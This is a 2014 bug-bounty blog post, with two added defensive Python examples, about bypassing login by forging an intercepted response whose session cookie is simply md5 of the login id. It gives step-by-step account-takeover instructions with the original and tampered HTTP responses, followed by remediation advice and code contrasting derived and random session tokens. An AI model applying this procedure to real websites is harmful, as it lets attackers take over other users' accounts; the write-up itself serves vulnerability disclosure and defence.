Tuesday, May 6, 2014

A Way to Bypass Authentication

Authentication Bypass Using Login Validation Process Prediction


While researching and working on bug bounties in late Dec 2012, I found a way to bypass authentication that lets an attacker take over every user account of a website, if that site is vulnerable to this type of attack.

Using this vulnerability the attacker can predict the login validation process for any victim's account by combining several techniques. In this way he bypasses the password check for every account and compromises the victim's account, because the outcome of the login validation process is predictable to the attacker.

I tried several techniques to bypass the login, such as response code modification and arbitrary HTTP method usage, but all of them failed. The challenge was therefore to understand the login validation process and find a weakness in it. Below I describe how I was able to bypass the authentication.


Please note: there is one precondition, namely that the attacker must know the victim's login id or user id.


Steps to Execute the Attack:
To analyse the login validation process I created 2 test accounts.

1. First, send the login request using our own account attackerloginid with a wrong password, intercepting the response for the wrong password, using the login link below.

https://testsite.com/login.jsp

2. From this I found that if the password is wrong, the server response code is 200 OK, a Set-Cookie named pstoken is sent once with an empty (null) value, and the JSON status in the body is {"failed":false}.

3. Now send the login request using our own account attackerloginid with the right password, intercepting the response for the right password, using the login link below.

https://testsite.com/login.jsp

4. From this I found that if the password is right, the server response code is 302 Found, a Set-Cookie named pstoken is sent twice with the value 636559678682db9e21c958a4df44eea4, which is the md5 hash of the attacker's user id or login id, and the JSON status in the body is {"success":true}.

5. Now that we know how the server responses for wrong and right passwords differ, we can predict the login validation process for the right password.

In simple words: the attacker tries to log into the victim's account using the login URL and the victim's user id or login id, victimloginid, with a wrong password, while intercepting the response with any web proxy. He gets a 200 OK server response with a Set-Cookie named pstoken sent once with a null value, and a JSON status in the body of {"failed":false}.

The attacker then modifies the response code from 200 OK to 302 Found, adds the Set-Cookie named pstoken twice, changing its value from null to the md5 hash of the victim's user id or login id, which is e9fc2abd9060fde1a67e3367b7d64bd0, changes the JSON status from {"failed":false} to {"success":true}, and forwards the modified response through the web proxy. The attacker is now logged into the victim's account.

So in this way we can easily bypass the authentication :).


Attacker's login ID: attackerloginid, md5 hash value:
636559678682db9e21c958a4df44eea4

Victim's login ID: victimloginid, md5 hash value:
e9fc2abd9060fde1a67e3367b7d64bd0

Original server response using the attacker's account with a wrong password:

HTTP/1.1 200 OK
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"failed":false}


Original server response using the attacker's account with the right password:

HTTP/1.1 302 Found
Date: Wed,  7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"success":true}

Modified response in which the attacker changed the response code, the Set-Cookie headers and their values, and the JSON status value, and then forwarded it to the browser:

HTTP/1.1 302 Found
Date: Wed, 7 May 2014 21:17:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Set-Cookie: pstoken=e9fc2abd9060fde1a67e3367b7d64bd0; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/
Content-Length: 16
Connection: close
Content-Type: text/html; charset=UTF-8

{"success":true}
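The three captured responses above differ in exactly the fields the write-up names: status line, number and value of the pstoken Set-Cookie headers, and the JSON body. The following script is an added example, not part of the original post, that parses the two original responses (embedded verbatim as sample input, with the date and cache headers trimmed) and reports the findings a reviewer would raise about how the login response establishes a session. The name pstoken and the login id attackerloginid come from the post; the review rules and the function names are this example's own.

```python
import hashlib
import json
from typing import Dict, List, Optional, Tuple

# Sample input: the two original server responses quoted in the post,
# embedded here verbatim apart from the Date/Expires/Cache-Control headers.
WRONG_PASSWORD_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: pstoken=; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/\r\n"
    "Content-Length: 16\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    '{"failed":false}'
)
RIGHT_PASSWORD_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: Apache\r\n"
    "Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/\r\n"
    "Set-Cookie: pstoken=636559678682db9e21c958a4df44eea4; expires=Tue, 25-Mar-2014 21:32:27 GMT; path=/\r\n"
    "Content-Length: 16\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    '{"success":true}'
)


def parse_response(raw: str) -> Dict[str, object]:
    """Split a raw HTTP/1.1 response into status, headers, Set-Cookie pairs and JSON body.

    Set-Cookie is kept as an ordered list of (name, value) so duplicates, like the
    doubled pstoken in the post, stay visible instead of being collapsed.
    """
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    status_line, *header_lines = head.split("\n")
    _version, status, reason = status_line.split(" ", 2)
    headers: List[Tuple[str, str]] = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    set_cookies: List[Tuple[str, str]] = []
    for name, value in headers:
        if name == "set-cookie":
            cookie_pair = value.split(";", 1)[0]      # drop expires/path attributes
            cname, _, cval = cookie_pair.partition("=")
            set_cookies.append((cname.strip(), cval.strip()))
    try:
        body_json: Optional[object] = json.loads(body.strip())
    except json.JSONDecodeError:
        body_json = None
    return {"status": int(status), "reason": reason, "headers": headers,
            "set_cookies": set_cookies, "body": body_json}


def md5_hex(text: str) -> str:
    """Hex md5 of a string: the derivation of pstoken the post describes."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def review_session_cookie(parsed: Dict[str, object], login_id: str,
                          cookie_name: str = "pstoken") -> List[str]:
    """Findings about how a login response establishes a session.

    The decisive check is whether the cookie value can be derived from the login id
    alone; if it can, possession of the cookie proves nothing about the password.
    """
    findings: List[str] = []
    values = [v for n, v in parsed["set_cookies"] if n == cookie_name]
    if len(values) > 1:
        findings.append(f"{cookie_name} is set {len(values)} times in one response")
    for value in values:
        if value and value == md5_hex(login_id):
            findings.append(f"{cookie_name} equals md5(login id): anyone who knows a "
                            "login id can compute the session cookie without a password")
        elif len(value) == 32 and all(c in "0123456789abcdef" for c in value):
            findings.append(f"{cookie_name} has the shape of a 128-bit hex digest; "
                            "confirm it is random rather than derived from user data")
    return findings


if __name__ == "__main__":
    for label, raw in (("wrong password", WRONG_PASSWORD_RESPONSE),
                       ("right password", RIGHT_PASSWORD_RESPONSE)):
        parsed = parse_response(raw)
        print(label, parsed["status"], parsed["set_cookies"], parsed["body"])
        for finding in review_session_cookie(parsed, "attackerloginid"):
            print("  finding:", finding)
```

The parser deliberately keeps Set-Cookie as a list rather than a dictionary; collapsing headers by name would hide the doubled pstoken that the write-up relies on to distinguish success from failure.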


Impact:
The login validation process is predictable, so an attacker can easily compromise any user account of the application.


Recommendation:
The login validation shall not depend on a combination of response code, cookie values and JSON status values. It shall also not rely on client-side validation; instead, proper server-side validation of the password shall be performed.

In this way one can take over, or bypass the authentication of, any victim's account using login validation process prediction, and the same approach can be used to find the same type of vulnerability on many different websites.
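To make the recommendation concrete, the following added example (this is illustrative code, not the vulnerable site's or the author's code) puts the issuance scheme the post observed, a session cookie equal to md5(login id), next to a hardened one in which the cookie is a random value that only a server-side session table can interpret. With the weak scheme the server accepts a cookie anyone can compute from a login id; with the hardened scheme a cookie is only valid if the server itself issued it after checking the password. The user names come from the post; the passwords, the in-memory stores and the function names are constructed for the example.

```python
import hashlib
import secrets
from typing import Dict, Optional

# Constructed user store for the example. Plaintext passwords keep the
# demonstration short; a real store would hold salted password hashes.
USERS: Dict[str, str] = {
    "attackerloginid": "attacker-password",
    "victimloginid": "victim-password",
}


def predict_weak_token(login_id: str) -> str:
    """The cookie value the post shows: md5 of the login id, nothing secret."""
    return hashlib.md5(login_id.encode("utf-8")).hexdigest()


def weak_login(login_id: str, password: str) -> Optional[str]:
    """Vulnerable pattern: the password is checked, but the resulting session
    cookie is derived from public data, so the check can be skipped entirely."""
    if USERS.get(login_id) != password:
        return None
    return predict_weak_token(login_id)


def weak_is_logged_in(pstoken: str) -> Optional[str]:
    """Vulnerable server check: any cookie equal to md5(some login id) is accepted."""
    for login_id in USERS:
        if secrets.compare_digest(predict_weak_token(login_id), pstoken):
            return login_id
    return None


# ---- hardened version ----

# Server-side session table: random token -> login id. Only this table decides
# whether a cookie is valid; the cookie value itself carries no meaning.
SESSIONS: Dict[str, str] = {}


def hardened_login(login_id: str, password: str) -> Optional[str]:
    """Password is verified server-side; on success a fresh random token is
    recorded in SESSIONS and returned to be set as the cookie."""
    if USERS.get(login_id) != password:
        return None
    token = secrets.token_urlsafe(32)    # 256 bits from the OS CSPRNG
    SESSIONS[token] = login_id
    return token


def hardened_is_logged_in(pstoken: str) -> Optional[str]:
    """A cookie is valid only if the server issued it; nothing is derivable."""
    return SESSIONS.get(pstoken)


def hardened_logout(pstoken: str) -> None:
    """Invalidation is a server-side delete, which the weak scheme cannot do at all."""
    SESSIONS.pop(pstoken, None)


if __name__ == "__main__":
    guessed = predict_weak_token("victimloginid")
    print("weak scheme accepts a computed cookie as:", weak_is_logged_in(guessed))
    print("hardened scheme accepts it as:", hardened_is_logged_in(guessed))
    real = hardened_login("victimloginid", "victim-password")
    print("hardened scheme accepts its own token as:", hardened_is_logged_in(real))
```

Note that the weak scheme's problem is not the use of md5 as such but that the token is a deterministic function of a public identifier: any unkeyed hash, or a keyed one whose key leaks, has the same flaw. The hardened scheme also gives the server something it otherwise lacks, namely the ability to revoke a session.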


Suggestions and Feedbacks are welcome.

1 comment:

You Have Successfully Posted the Message.